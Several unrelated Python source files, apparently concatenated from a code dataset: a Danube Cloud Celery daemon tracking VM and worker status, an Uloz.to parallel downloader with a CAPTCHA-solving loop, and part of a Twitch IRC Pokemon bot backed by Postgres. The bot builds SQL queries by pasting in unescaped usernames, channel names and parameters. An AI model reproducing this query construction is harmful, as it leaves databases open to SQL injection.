logger.info('Emitting VM status changes on node %s via %s', self.node_uuid, vm_status_task)
while True:
event = queue.get()
task_id = task_id_from_string(task_user)
logger.info('Creating task %s for event: "%s"', task_id, event)
# Create VM status task
send_task_forever(self.label, vm_status_task, args=(event, task_id), queue=Q_MGMT, expires=None,
task_id=task_id)
def _vm_status_monitor(self, sysevent_stdout):
"""THREAD: Reads line by line from sysevent process and puts relevant VM status changes into queue"""
vm_status = self.VM_STATUS
node_uuid = self.node_uuid
queue = self.vm_status_queue
logger.info('Monitoring VM status changes on node %s', node_uuid)
for line in iter(sysevent_stdout.readline, ''):
line = line.strip()
try:
event = json.loads(line)['data']
except Exception as e:
logger.critical('Could not parse (%s), sysevent line: "%s"', e, line)
continue
try:
state = vm_status[event.get('newstate')]
except KeyError:
logger.debug('Ignoring event "%s"', event)
continue
event['node_uuid'] = node_uuid
event['state'] = state
logger.info('Got new event: "%s"', event)
queue.put(event)
def _vm_status_thread_check(self):
"""Check if both vm_status threads are alive. Run periodically."""
if not self._stopping:
if self.vm_status_monitor_thread and not self.vm_status_monitor_thread.is_alive():
err = 'VM status monitoring thread is not running - terminating %s!' % self.label
logger.critical(err)
raise SystemExit(err)
if self.vm_status_dispatcher_thread and not self.vm_status_dispatcher_thread.is_alive():
err = 'VM status dispatcher thread is not running - terminating %s!' % self.label
logger.critical(err)
raise SystemExit(err)
def _set_node_uuid(self):
"""Fetch compute node's UUID"""
from que.utils import fetch_node_uuid # Circular imports
from que.exceptions import NodeError
try:
self.node_uuid = fetch_node_uuid()
except NodeError as exc:
err = str(exc)
logger.critical(err)
raise SystemExit(err)
def start(self, parent):
self._set_node_uuid()
super(FastDaemon, self).start(parent)
self.vm_status_queue = Queue()
self.vm_status_watcher = Popen(self.SYSEVENT, bufsize=0, close_fds=True, stdout=PIPE, stderr=STDOUT,
preexec_fn=os.setsid)
self.vm_status_monitor_thread = Thread(target=self._vm_status_monitor, name='VMStatusMonitor',
args=(self.vm_status_watcher.stdout,))
self.vm_status_monitor_thread.daemon = True
self.vm_status_monitor_thread.start()
self.vm_status_dispatcher_thread = Thread(target=self._vm_status_dispatcher, name='VMStatusDispatcher')
self.vm_status_dispatcher_thread.daemon = True
self.vm_status_dispatcher_thread.start()
def stop(self, parent):
super(FastDaemon, self).stop(parent)
if self.vm_status_watcher:
try:
self.vm_status_watcher.terminate()
except NoSuchProcess:
pass
else:
self.vm_status_watcher.wait()
class MgmtDaemon(_PeriodicTaskDaemon):
"""
Danube Cloud internal mgmt daemon - periodically monitors compute nodes.
"""
label = 'MgmtDaemon'
requires = ('celery.worker.consumer:Events', 'celery.worker.consumer:Gossip')
def __init__(self, parent, **kwargs):
conf = parent.app.conf
self.enabled = conf.ERIGONES_MGMT_DAEMON_ENABLED and parent.hostname.startswith(Q_MGMT + '@')
super(MgmtDaemon, self).__init__(parent, **kwargs)
if self.enabled:
self.app = parent.app
# noinspection PyProtectedMember
from api.node.status.tasks import node_status_all
self._periodic_tasks.append(node_status_all)
def _node_lost(self, worker):
logger.warning('missed heartbeat from %s', worker.hostname)
self.dispatcher.send('worker-lost', worker_hostname=worker.hostname)
def _enable_worker_lost_event(self, gossip):
# noinspection PyAttributeOutsideInit
self.dispatcher = gossip.dispatcher
logger.info('Monkey patching gossip.on_node_lost')
gossip.on_node_lost = self._node_lost
def __worker_status_monitor(self):
# noinspection PyProtectedMember
from api.node.status.tasks import node_worker_status_change
def _worker_state(hostname, status, event):
logger.info('Received %s node worker status: %s', hostname, status)
queue, node_hostname = hostname.split('@')
if queue != Q_MGMT:
node_worker_status_change(node_hostname, queue, status, event)
def worker_online(event):
_worker_state(event['hostname'], 'online', event)
def worker_offline(event):
_worker_state(event['hostname'], 'offline', event)
def worker_lost(event):
_worker_state(event['worker_hostname'], 'offline', event)
# Here we go
with self.app.connection() as conn:
recv = self.app.events.Receiver(conn, handlers={
'worker-online': worker_online,
'worker-offline': worker_offline,
'worker-lost': worker_lost,
})
recv.capture(limit=None, timeout=None, wakeup=False)
def _worker_status_monitor(self):
"""THREAD: Runs celery's task queue receiver and monitors worker related events"""
while True:
logger.info('Starting worker status monitor')
try:
self.__worker_status_monitor()
except Exception as exc:
logger.exception(exc)
logger.critical('Worker status monitor terminated. Restarting in 5 seconds...')
sleep(5)
def start(self, parent):
self._enable_worker_lost_event(parent.gossip)
super(MgmtDaemon, self).start(parent)
worker_status_monitor_thread = Thread(target=self._worker_status_monitor, name='WorkerStatusMonitor')
worker_status_monitor_thread.daemon = True
worker_status_monitor_thread.start()
|
downloader.py
|
import os
import sys
import multiprocessing as mp
import time
from datetime import timedelta
from types import FunctionType
import requests
import colors
from .page import Page
from . import utils, const
class Downloader:
cli_initialized: bool
terminating: bool
processes: list
captcha_process: mp.Process
captcha_solve_func: FunctionType
download_url_queue: mp.Queue
parts: int
def __init__(self, captcha_solve_func):
self.captcha_solve_func = captcha_solve_func
self.cli_initialized = False
def terminate(self):
self.terminating = True
if self.cli_initialized:
sys.stdout.write("\033[{};{}H".format(self.parts + const.CLI_STATUS_STARTLINE + 2, 0))
sys.stdout.write("\033[?25h") # show cursor
self.cli_initialized = False
print('Terminating download. Please wait for stopping all processes.')
if self.captcha_process is not None:
self.captcha_process.terminate()
for p in self.processes:
p.terminate()
print('Download terminated.')
return
def _captcha_breaker(self, page, parts):
while True:
utils.print_captcha_status("Solving CAPTCHA...", parts)
self.download_url_queue.put(
page.get_captcha_download_link(
captcha_solve_func=self.captcha_solve_func,
print_func=lambda text: utils.print_captcha_status(text, parts)
)
)
@staticmethod
def _download_part(part, download_url_queue):
"""Download given part of the download.
Arguments:
part (dict): Specification of the part to download
"""
id = part['id']
utils.print_part_status(id, "Starting download")
part['started'] = time.time()
part['now_downloaded'] = 0
# Note the stream=True parameter
r = requests.get(part['download_url'], stream=True, allow_redirects=True, headers={
"Range": "bytes={}-{}".format(part['from'] + part['downloaded'], part['to'])
})
if r.status_code != 206 and r.status_code != 200:
utils.print_part_status(id, colors.red(f"Status code {r.status_code} returned"))
raise RuntimeError(f"Download of part {id} returned status code {r.status_code}")
with open(part['filename'], 'ab') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
part['downloaded'] += len(chunk)
part['now_downloaded'] += len(chunk)
elapsed = time.time() - part['started']
# Print status line
speed = part['now_downloaded'] / elapsed if elapsed > 0 else 0 # in bytes per second
remaining = (part['size'] - part['downloaded']) / speed if speed > 0 else 0 # in seconds
utils.print_part_status(id, "{}%\t{:.2f}/{:.2f} MB\tspeed: {:.2f} KB/s\telapsed: {}\tremaining: {}".format(
round(part['downloaded'] / part['size'] * 100, 1),
round(part['downloaded'] / 1024**2, 2), round(part['size'] / 1024**2, 2),
round(speed / 1024, 2),
str(timedelta(seconds=round(elapsed))),
str(timedelta(seconds=round(remaining))),
))
part['elapsed'] = time.time() - part['started']
utils.print_part_status(id, colors.green("Successfully downloaded {}{} MB in {} (speed {} KB/s)".format(
round(part['now_downloaded'] / 1024**2, 2),
"" if part['now_downloaded'] == part['downloaded'] else ("/"+str(round(part['downloaded'] / 1024**2, 2))),
str(timedelta(seconds=round(part['elapsed']))),
round(part['now_downloaded'] / part['elapsed'] / 1024, 2) if part['elapsed'] > 0 else 0
)))
# Free this (still valid) download URL for next use
download_url_queue.put(part['download_url'])
def download(self, url, parts=10, target_dir=""):
"""Download file from Uloz.to using multiple parallel downloads.
Arguments:
url (str): URL of the Uloz.to file to download
parts (int): Number of parts that will be downloaded in parallel (default: 10)
target_dir (str): Directory where the download should be saved (default: current directory)
"""
self.url = url
self.parts = parts
self.processes = []
self.captcha_process = None
self.target_dir = target_dir
self.terminating = False
started = time.time()
previously_downloaded = 0
# 1. Prepare downloads
print("Starting downloading for url '{}'".format(url))
# 1.1 Get all needed information
print("Getting info (filename, filesize, ...)")
try:
page = Page(url)
page.parse()
except RuntimeError as e:
print(colors.red('Cannot download file: ' + str(e)))
sys.exit(1)
# Do check
output_filename = os.path.join(target_dir, page.filename)
if os.path.isfile(output_filename):
print(colors.yellow("WARNING: File '{}' already exists, overwrite it? [y/n] ".format(output_filename)), end="")
if input().strip() != 'y':
sys.exit(1)
isCAPTCHA = False
if page.quickDownloadURL is not None:
print("You are VERY lucky, this is QUICK direct download without CAPTCHA, downloading as 1 quick part :)")
download_type = "fullspeed direct download (without CAPTCHA)"
download_url = page.quickDownloadURL
parts = 1
self.parts = 1
elif page.slowDownloadURL is not None:
print("You are lucky, this is slow direct download without CAPTCHA :)")
download_type = "slow direct download (without CAPTCHA)"
download_url = page.slowDownloadURL
else:
print("CAPTCHA protected download - CAPTCHA challenges will be displayed\n")
download_type = "CAPTCHA protected download"
isCAPTCHA = True
download_url = page.get_captcha_download_link(
captcha_solve_func=self.captcha_solve_func,
print_func=lambda text: sys.stdout.write(colors.blue("[CAPTCHA solve]\t") + text + "\033[K\r")
)
head = requests.head(download_url, allow_redirects=True)
total_size = int(head.headers['Content-Length'])
part_size = (total_size + (parts - 1)) // parts
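# Ceiling division: e.g. total_size=10 and parts=3 gives part_size=4, so the
# byte ranges below become 0-3, 4-7 and 8-9 (the last part is shorter).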
# 1.3 Prepare download info for parts
downloads = [
{
'id': i + 1,
'filename': "{0}.part{1:0{width}}of{2}".format(output_filename, i + 1, parts, width=len(str(parts))),
'from': part_size * i,
'to': min(part_size * (i + 1), total_size) - 1,
'downloaded': 0,
} for i in range(parts)
]
# 2. Initialize cli status table interface
os.system('cls' if os.name == 'nt' else 'clear') # if windows, use 'cls', otherwise use 'clear'
sys.stdout.write("\033[?25l") # hide cursor
self.cli_initialized = True
print(colors.blue("File:\t\t") + colors.bold(page.filename))
print(colors.blue("URL:\t\t") + url)
print(colors.blue("Download type:\t") + download_type)
print(colors.blue("Total size:\t") + colors.bold("{}MB".format(round(total_size / 1024**2, 2))))
print(colors.blue("Parts:\t\t") + "{} x {}MB".format(parts, round(part_size / 1024**2, 2)))
for part in downloads:
if isCAPTCHA:
utils.print_part_status(part['id'], "Waiting for CAPTCHA...")
else:
utils.print_part_status(part['id'], "Waiting for download to start...")
# Prepare queue for recycling download URLs
self.download_url_queue = mp.Queue(maxsize=0)
if isCAPTCHA:
# Reuse already solved CAPTCHA
self.download_url_queue.put(download_url)
# Start CAPTCHA breaker in separate process
self.captcha_process = mp.Process(target=self._captcha_breaker, args=(page, self.parts))
self.captcha_process.start()
# 3. Start all downloads
for part in downloads:
if self.terminating:
return
id = part['id']
part['size'] = part['to'] - part['from'] + 1
# Test if the file isn't downloaded from previous download. If so, try to continue
if os.path.isfile(part['filename']):
part['downloaded'] = os.path.getsize(part['filename'])
previously_downloaded += part['downloaded']
if part['downloaded'] == part['size']:
utils.print_part_status(id, colors.green("Already downloaded from previous run, skipping"))
continue
if isCAPTCHA:
part['download_url'] = self.download_url_queue.get()
else:
part['download_url'] = download_url
# Start download process in another process (parallel):
p = mp.Process(target=Downloader._download_part, args=(part, self.download_url_queue))
p.start()
self.processes.append(p)
if isCAPTCHA:
# no need for more CAPTCHAs
self.captcha_process.terminate()
utils.print_captcha_status("All downloads started, no need to solve more CAPTCHAs", self.parts)
# 4. Wait for all downloads to finish
success = True
for p in self.processes:
p.join()
if p.exitcode != 0:
success = False
# Check all downloads
checkError = False
for part in downloads:
if not os.path.isfile(part['filename']):
utils.print_part_status(part['id'], colors.red(
f"ERROR: Part '{part['filename']}' missing on disk"
))
checkError = True
continue
size = os.path.getsize(part['filename'])
if size != part['size']:
utils.print_part_status(part['id'], colors.red(
f"ERROR: Part '{part['filename']}' has wrong size {size} bytes (instead of {part['size']} bytes)"
))
os.remove(part['filename'])
checkError = True
sys.stdout.write("\033[{};{}H".format(parts + const.CLI_STATUS_STARTLINE + 2, 0))
sys.stdout.write("\033[K")
sys.stdout.write("\033[?25h") # show cursor
self.cli_initialized = False
if not success:
print(colors.red("Failure of one or more downloads, exiting"))
sys.exit(1)
if checkError:
print(colors.red("Wrong sized parts deleted, please restart the download"))
sys.exit(1)
# 5. Concatenate all parts into final file and remove partial files
elapsed = time.time() - started
speed = (total_size - previously_downloaded) / elapsed if elapsed > 0 else 0 # in bytes per second
print(colors.green("All downloads finished"))
print("Stats: Downloaded {}{} MB in {} (average speed {} MB/s), merging files...".format(
round((total_size - previously_downloaded) / 1024**2, 2),
"" if previously_downloaded == 0 else ("/"+str(round(total_size / 1024**2, 2))),
str(timedelta(seconds=round(elapsed))),
round(speed / 1024**2, 2)
))
with open(output_filename, "wb") as outfile:
for part in downloads:
with open(part['filename'], "rb") as infile:
outfile.write(infile.read())
for part in downloads:
os.remove(part['filename'])
print(colors.green("Parts merged into output file '{}'".format(output_filename)))
|
brdybot.py
|
#this is for opening the configuration file
import sys
import configparser
#this is for connecting to IRC
import socket
#this is for connecting to the postgres database
import psycopg2
#this is for doing cute equations
import math
#for multithreading for additional channels
import threading
#traceback is for error handling/printing so i can figure out what went wrong
import traceback
#sleep is so the bot won't overload during listening
from time import sleep
def main():
conn, token, user, readbuffer, server = connectionVariables()
#channels = performSQL("SELECT channelname FROM bot.channel ch WHERE ch.channelname = 'brdy'")
channels = performSQL("SELECT channelname FROM bot.channel ch WHERE ch.channelid NOT in(SELECT cd.channelid FROM bot.channeldeletion cd)")
commandDict = getCommands()
for channel in channels:
channel = channel[0]
operators = getOperants(channel)
threading.Thread(target=ircListen, args=(conn, token, user, channel, server, operators, commandDict)).start()
sleep(2)
def getOperants(channel):
operators = []
operants = performSQL("""SELECT operantname FROM bot.channeloperant co
LEFT JOIN bot.channel ch ON co.channelid = ch.channelid
LEFT JOIN bot.operant op ON co.operantid = op.operantid
WHERE ch.channelname = '"""+channel+"'")
for operant in operants:
operators.append(operant[0])
return operators
def connectionVariables():
connection_data = ('irc.chat.twitch.tv', 6667)
token = getToken()
botName = "brdybot"
readbuffer = ''
server = socket.socket()
return connection_data, token, botName, readbuffer, server
def getToken():
config = configparser.ConfigParser()
file = "chatbot.ini"
config.read(file)
token = config['chatbot']['token']
return token
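# Expected chatbot.ini layout (inferred from the keys read above; the value is
# sent as the IRC PASS when connecting to Twitch):
#   [chatbot]
#   token = <twitch oauth token>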
def ircListen(conn, token, botName, channel, server, operators, commandDict):
try:
listenFlag = True
commandrequestid = None  # defined up-front so the exception handlers below never raise a NameError
#joining the channel
server = socket.socket()
server.connect(conn)
server.send(bytes('PASS ' + token + '\r\n', 'utf-8'))
server.send(bytes('NICK ' + botName + '\r\n', 'utf-8'))
server.send(bytes('JOIN #' + channel + '\r\n', 'utf-8'))
#listening loop
print("Starting bot in channel " +channel + " with operants: "+str(operators))
while listenFlag:
response = server.recv(2048).decode('utf-8')
if len(response) == 0:
break
if "PING" in str(response):
pong = str(response).replace("PING","PONG")
server.send(bytes(pong, 'utf-8'))
server.send(bytes('PONG\r\n', 'utf-8'))
elif "!" in str(response):
#fetch the username,message,etc. from the response without grabbing pings, errors, or erroneous messages
if len(str(response)) > 2:
username = str(response).split('!',1)[0][1:]
if ":" in str(response):
splitResp = str(response).split(':')
if len(splitResp) > 3:
splitResp = str(response).split(':')[2]+str(response).split(':')[3]
else:
splitResp = str(response).split(':')[2]
userMessage = splitResp[0:len(splitResp)-2]
else:
userMessage = " "
command = userMessage.split(" ")[0].lower().replace("'","''")
parameters = userMessage.split(" ")[1:]
permissions = (username in operators) or (channel == 'brdybot') or (command == "!botinfo")
if ("!" in command[0:1]) and (command[1:] in commandDict) and permissions:
commandid = commandDict[command[1:]]
commandrequestid = logCommand(commandid,channel,username,parameters)
message = None
message = doCommand(commandrequestid)
if message:
chatMessage(message,channel,server)
operators = getOperants(channel)
success = storeMessage(message, commandrequestid)
sleep(1)
except ConnectionResetError:
logException(None, "ConnectionResetError", channel)
except IndexError:
logException(commandrequestid,"IndexError", channel)
except KeyError:
logException(commandrequestid,"KeyError", channel)
except RuntimeError:
logException(commandrequestid,"RuntimeError", channel)
except SystemExit:
logException(commandrequestid,"SystemExit", channel)
except ValueError:
logException(commandrequestid,"ValueError", channel)
except BrokenPipeError:
logException(commandrequestid,"BrokenPipeError", channel)
except ConnectionAbortedError:
logException(commandrequestid,"ConnectionAbortedError", channel)
except ConnectionRefusedError:
logException(commandrequestid,"ConnectionRefusedError", channel)
except FileNotFoundError:
logException(commandrequestid,"FileNotFoundError", channel)
except TimeoutError:
logException(commandrequestid,"TimeoutError", channel)
except Exception:
logException(commandrequestid,"OtherError", channel)
def getCommands():
commands = performSQL("SELECT commandid,commandname FROM bot.command")
commandDict = {}
for command in commands:
commandDict[command[1]] = command[0]
return commandDict
def doCommand(commandrequestid):
conn, token, botName, readbuffer, server = connectionVariables()
parameters = []
ccr = performSQL("SELECT com.commandname,ch.channelname,op.operantname,ccrp.channelcommandrequestparameter FROM bot.channelcommandrequest ccr LEFT JOIN bot.command com ON ccr.commandid = com.commandid LEFT JOIN bot.channel ch ON ccr.channelid = ch.channelid LEFT JOIN bot.operant op ON ccr.operantid = op.operantid LEFT JOIN bot.channelcommandrequestparameter ccrp ON ccr.channelcommandrequestid = ccrp.channelcommandrequestid WHERE ccr.channelcommandrequestid ="+str(commandrequestid))
for command,channel,username,parameter in ccr:
parameters.append(parameter)
if command == "mon":
message = getMonInfo(parameters,channel)
elif command == "move":
message = getMoveInfo(parameters,channel)
elif command == "ability":
message = getAbilityInfo(parameters,channel)
# elif command == "xp":
# message = getXPYield()
# elif command == "bst":
# message = getBST()
# elif command == "learnset":
# message = getMonMoves()
# elif command == "evolution":
# message = getMonEvo()
elif command == "nature":
message = getNatureInfo(parameters,channel)
elif command == "weak":
message = getWeaknessInfo(parameters,channel)
elif command == "coverage":
message = getCoverage(parameters,channel)
elif command == "abbrevs":
message = getAbbrevs()
elif command == "gamelist":
message = getGames()
elif command == "pokegame":
message = setGame(parameters, channel, server)
elif command == "pokeops":
message = addOperants(parameters,channel)
elif command == "removeops" and channel == username:
message = removeOperants(parameters,channel)
elif command == "listops":
message = listOperants(channel)
elif command == "join" and channel == "brdybot":
message = addClient(conn,token,botName,username,server)
elif command == "brdybotleave" and channel == username:
message = removeClient(username)
elif command == "pokecom":
commands = "!mon, !move, !ability, !coverage, !nature, !weak, !pokegame, !abbrevs, !gamelist, !botinfo, !listops, !pokeops, !pokecom, !brdybotleave"
message = "Available commands are " + commands + "."
elif command == "botinfo":
message = "Visit https://www.twitch.tv/brdybot/about"
return message
def storeMessage(message,ccrid):
success = performSQL("UPDATE bot.channelcommandrequest SET channelcommandrequestreturn ='"+message.replace("'","''")+"' WHERE channelcommandrequestid = "+str(ccrid)+" RETURNING channelcommandrequestid;")
return success
def logException(commandrequestid, exception, channel):
channelid = getChannelID(channel)
if not commandrequestid:
commandrequestid = "null"
errortypeid = performSQL("SELECT errortypeid FROM bot.errortype WHERE errortypename = '"+exception+"'")
if errortypeid != []:
errortypeid = errortypeid[0][0]
else:
errortypeid = performSQL("SELECT errortypeid FROM bot.errortype WHERE errortypename = 'OtherError'")[0][0]
channelerrorid = performSQL("INSERT INTO bot.channelerror (channelcommandrequestid,errortypeid) VALUES ("+str(commandrequestid)+","+str(errortypeid)+") RETURNING channelerrorid;")
traceback.print_exc()
print(" with channelerrorid = "+str(channelerrorid))
commandDict = getCommands()
conn, token, user, readbuffer, server = connectionVariables()
operators = getOperants(channel)
threading.Thread(target=ircListen, args=(conn, token, "brdybot", channel, server, operators, commandDict)).start()
sys.exit()
def getChannelID(channel):
channelid = performSQL("SELECT ch.channelid FROM bot.channel ch WHERE ch.channelname ='"+channel+"'")[0][0]
return channelid
def logCommand(commandid,channelname,operantname,parameters):
commandname = performSQL("SELECT com.commandname FROM bot.command com WHERE com.commandid = "+str(commandid))[0][0]
if commandid == 9:
success = addOperants([operantname],channelname)
channelid = getChannelID(channelname)
operantid = performSQL("SELECT op.operantid FROM bot.operant op WHERE op.operantname = '"+operantname+"'")[0][0]
print("\r\n________________________________________________________________________________________________________")
print("Received the "+commandname+" command in channel "+channelname+" from user "+operantname+". Parameters: "+str(parameters)+"\r\n")
channelcommandrequestid = performSQL("INSERT INTO bot.channelcommandrequest (commandid,channelid,operantid) VALUES ("+str(commandid)+","+str(channelid)+","+str(operantid)+") RETURNING channelcommandrequestid;")[0][0]
for parameter in parameters:
parameter = parameter.replace("'","''")
parameterid = performSQL("INSERT INTO bot.channelcommandrequestparameter (channelcommandrequestid,channelcommandrequestparameter) VALUES ("+str(channelcommandrequestid)+",'"+parameter+"') RETURNING channelcommandrequestparameterid;")
return channelcommandrequestid
def addOperants(parameters, channel):
note = " User(s) "
exists = False
for parameter in parameters:
parameter = parameter.lower()
operantid = performSQL("SELECT operantid FROM bot.operant WHERE operantname = '"+parameter+"'")
if operantid == []:
operantid = performSQL("INSERT INTO bot.operant (operantname) values ('"+parameter+"') RETURNING operantid;")[0][0]
else:
operantid = operantid[0][0]
operantid = str(operantid)
channeloperantid = performSQL("SELECT channeloperantid FROM bot.channeloperant co LEFT JOIN bot.channel ch ON co.channelid = ch.channelid LEFT JOIN bot.operant op ON co.operantid = op.operantid WHERE ch.channelname = '"+channel+"' AND co.operantid ="+operantid)
if channeloperantid == []:
sql = "INSERT INTO bot.channeloperant (channelid,operantid,operanttypeid) VALUES ((SELECT channelid FROM bot.channel WHERE channelname ='"+channel+"'),"+operantid+",2) RETURNING channeloperantid;"
channeloperantid = performSQL(sql)
else:
exists = True
if parameters.index(parameter) < len(parameters)-3:
note += parameter + ", "
elif parameters.index(parameter) < len(parameters)-2:
note += parameter + " and "
elif parameters.index(parameter) < len(parameters)-1:
note += parameter + " "
message = "Successfully added bot users to configuration."
if exists:
message += note + " already exist(s) as bot user(s) in channel "+channel+"."
return message
def removeOperants(parameters, channel):
message = "User(s) "
for parameter in parameters:
parameter = parameter.lower()
if parameter != channel:
sql = """DELETE FROM bot.channeloperant
WHERE channeloperantid =
(SELECT channeloperantid
FROM bot.channeloperant co
INNER JOIN bot.channel ch ON co.channelid = ch.channelid
INNER JOIN bot.operant op ON co.operantid = op.operantid
WHERE ch.channelname = '"""+channel+"' AND op.operantname = '"+parameter+"""')
RETURNING operantid;"""
operantid = performSQL(sql)
message += parameter
else:
message = "You cannot remove the channel owner from the operant list. "+message
message += " were removed from the channel's user list."
return message
def listOperants(channel):
message = "Users who have permissions in channel "+channel+": "
operants = getOperants(channel)
for operant in operants:
if operants.index(operant) < len(operants)-1:
message += operant+", "
else:
message += operant
return message
def addClient(conn, token, botName, username, server):
channelid = performSQL("SELECT channelid FROM bot.channel WHERE channelname = '"+username+"'")
operantid = performSQL("SELECT operantid FROM bot.operant WHERE operantname = '"+username+"'")
if channelid == []:
sql = "INSERT INTO bot.channel (channelname,gameid) VALUES ('"+username+"',10) RETURNING channelid;"
channelid = performSQL(sql)
if operantid == []:
sql = "INSERT INTO bot.operant (operantname) VALUES ('"+username+"') RETURNING operantid;"
operantid = performSQL(sql)
sql = """SELECT operanttypeid FROM bot.channeloperant co
LEFT JOIN bot.channel ch ON co.channelid = ch.channelid
LEFT JOIN bot.operant op ON co.operantid = op.operantid
WHERE ch.channelname = '"""+username+"""' AND op.operantname ='"""+username+"'"
channeloperantid = performSQL(sql)
if channeloperantid == []:
sql = "INSERT INTO bot.channeloperant (channelid, operantid, operanttypeid) VALUES ("+str(channelid[0][0])+","+str(operantid[0][0])+",1) RETURNING channeloperantid;"
channeloperantid = performSQL(sql)
message = username+""" - You have been successfully added to the channel list.
Game has been set to FireRed. Use !pokegame in your channel to change the game.
Note that I do store usernames and command usage records in the database for use in feature improvement.
Your username will NEVER be shared with anyone for any reason.
Use !brdybotleave in your channel to remove yourself from my channel list."""
operants = getOperants(username)
commandDict = getCommands()
threading.Thread(target=ircListen, args=(conn, token, botName, username, server, operants,commandDict)).start()
elif channeloperantid[0][0] == 1:
message = username+" - I should be operating in your channel. If I'm not, message brdy on Discord to correct the error."
return message
def removeClient(channel):
sql = "INSERT INTO bot.channeldeletion (channelid) values (SELECT ch.channelid FROM bot.channel ch WHERE ch.channelname = '"+channel+"') RETURNING channelid"
channelid = performSQL(sql)
message = channel+" - Successfully removed you from the channel list."
return message
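# getMoveID below fuzzy-matches the requested name against both move names and stored
# move nicknames using Levenshtein distance (cutoff < 5), so a hypothetical call like
# getMoveID("Thunderbolt") and a misspelt getMoveID("Thunderblot") should resolve to the
# same moveid (assuming the move exists in this database).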
def getMoveID(moveName):
moveID = performSQL(""" WITH ldist as (SELECT mv.moveid,LEAST(pokemon.levenshtein(mv.movename, '"""+moveName+"""'),
pokemon.levenshtein(mn.movenickname, '"""+moveName+"""')) AS distance FROM pokemon.move mv
LEFT JOIN pokemon.movenickname mn ON mv.moveid = mn.moveid)
SELECT moveid,distance FROM ldist WHERE distance < 5 ORDER BY distance LIMIT 1""")
moveID = str(moveID[0][0]) if moveID != [] else []
return moveID
def combineParameters(parameters):
name = ""
for parameter in parameters:
name += parameter + " "
name = name[:len(name)-1].title()
return name
def getMonID(monName,channel):
monName = monName.replace("'","''")
monID = performSQL("""WITH ldist as (SELECT DISTINCT mon.pokemonid,LEAST(pokemon.levenshtein(mon.pokemonname,'"""+monName+"""'),
pokemon.levenshtein(pn.pokemonnickname,'"""+monName+"""')) AS distance FROM pokemon.pokemon mon
LEFT JOIN pokemon.pokemonnickname pn ON mon.pokemonid = pn.pokemonid)
SELECT pokemonid,distance FROM ldist WHERE distance < 5 ORDER BY distance LIMIT 1""")
if monID == []:
errorString = "Could not find Pokemon "+monName+"."
return None,errorString
monID = str(monID[0][0])
monName = performSQL("""SELECT DISTINCT mon.pokemonname FROM pokemon.pokemon mon
WHERE mon.pokemonid = """+monID)
monName = str(monName[0][0])
return monID,monName
def getMonInfo(parameters,channel):
if len(parameters) < 1:
monInfo = "The !mon command requires the name of a pokemon as a parameter. (ex: '!mon charizard')"
return monInfo
monName = combineParameters(parameters)
monID,monName = getMonID(monName,channel)
game = getGame(channel)
if monID == None:
return monName
availability = performSQL("""SELECT DISTINCT pa.pokemonavailabilitytypeid
FROM pokemon.pokemongameavailability pa
LEFT JOIN pokemon.game ga ON pa.gameid = ga.gameid
LEFT JOIN pokemon.gamegroup gg ON gg.gamegroupid = ga.gamegroupid
WHERE pa.pokemonid = """+monID+" AND gg.gamegroupabbreviation = '"+game+"'")
if availability == [] or availability[0][0] == 18:
message = monName + " is not available in " + game + "."
return message
#this section gets all the info to be compiled in a string at the end of this function
monName,monDex,monGrowth,monCaptureRate = performSQL("""SELECT DISTINCT mon.pokemonname,mon.pokemonpokedexnumber,
lr.levelingratename,mon.pokemoncapturerate
FROM pokemon.pokemon mon
LEFT JOIN pokemon.levelingrate lr ON mon.levelingrateid = lr.levelingrateid
WHERE pokemonid = """+monID)[0]
monDex = str(monDex)
monCaptureRate = getCaptureRate(monCaptureRate, channel)
monTypes = getMonTypes(monID, channel)
monBST = getMonBST(monID, channel)
monXPYield = getXPYield(monID, channel,5,5)
monEvos = getMonEvos(monID, channel)
monMoves = getMonMoves(monID, channel)
#compiling all of the bits of info into one long string for return
monInfo = "#" + monDex +" " + monName + " ("+game+") " + monTypes + " | Catch: "+monCaptureRate+"% | BST: " + monBST + " | L5 XP: " + monXPYield + " | " + monGrowth + " | " + monEvos + " | " + monMoves
return monInfo
def getMonGrowth(monID,channel):
sql = "SELECT lr.levelingratename FROM pokemon.levelingrate lr LEFT JOIN pokemon.pokemon mon ON lr.levelingrateid = mon.levelingrateid WHERE mon.pokemonid = "+monID
rate = str(performSQL(sql)[0][0])
return rate
def getGeneration(channel):
generation = performSQL("""SELECT gen.generationid FROM bot.channel ch
LEFT JOIN pokemon.game gm ON ch.gameid = gm.gameid
LEFT JOIN pokemon.gamegroup gg ON gm.gamegroupid = gg.gamegroupid
LEFT JOIN pokemon.generation gen ON gg.generationid = gen.generationid
WHERE ch.channelname = '"""+channel+"'")[0][0]
generation = str(generation)
return generation
def getMonDex(monID, channel):
sql = """SELECT DISTINCT mon.pokemonpokedexnumber FROM pokemon.pokemon mon"""
sql += " WHERE mon.pokemonid = "+monID
dexArray = performSQL(sql)
monDex = str(dexArray[0][0])
return monDex
def getMonTypes(monID, channel):
gen = getGeneration(channel)
monTypes = """WITH monTypes as (SELECT pokemonid,type1id,type2id
FROM pokemon.crosstab('select pokemonid, typeid as type1id, typeid as type2id
FROM pokemon.pokemontype pt WHERE pt.generationid = """+gen+"""
AND pt.pokemonid = """+monID+"""
GROUP BY pokemonid,type1id,type2id ORDER BY pokemonid,type1id,type2id')
AS ct( pokemonid int, type1id int, type2id int)) \r\n"""
mainSelect = """SELECT type1.typename,type2.typename FROM monTypes
LEFT JOIN pokemon.type type1 ON monTypes.type1id = type1.typeid
LEFT JOIN pokemon.type type2 ON monTypes.type2id = type2.typeid"""
typeArray = performSQL(monTypes+mainSelect)
#if there are two types, store as (Type1/Type2)
#print(str(typeArray))
types = "("+str(typeArray[0][0])
if typeArray[0][1] != None:
types += "/"+str(typeArray[0][1])+")"
#otherwise, store as (Type)
else:
types += ")"
return types
def getMonBST(monID, channel):
gen = getGeneration(channel)
sql = """SELECT SUM(ps.pokemonstatvalue) bst, ps.generationid gen
FROM pokemon.pokemonstat ps """
sql += "LEFT JOIN pokemon.pokemon mon ON ps.pokemonid = mon.pokemonid WHERE mon.pokemonid ="+monID
sql += " AND ps.generationid <= "+gen+" GROUP BY gen ORDER BY gen DESC LIMIT 1"
bstArray = performSQL(sql)
monBST = str(bstArray[0][0])
return monBST
def getCaptureRate(captureRate,channel):
#this formula approximates the catch rate to within about .1% and will work for future catch rates not currently being used
captureRate = 0.0000000000566758779982193 * math.pow(captureRate,5) - 0.0000000427601042779669*math.pow(captureRate,4) + 0.0000125235963016363*math.pow(captureRate,3) - 0.00191121035271638*math.pow(captureRate,2) + 0.311407303213974*captureRate + 0.846589688792571
captureRate = round(captureRate, 1)
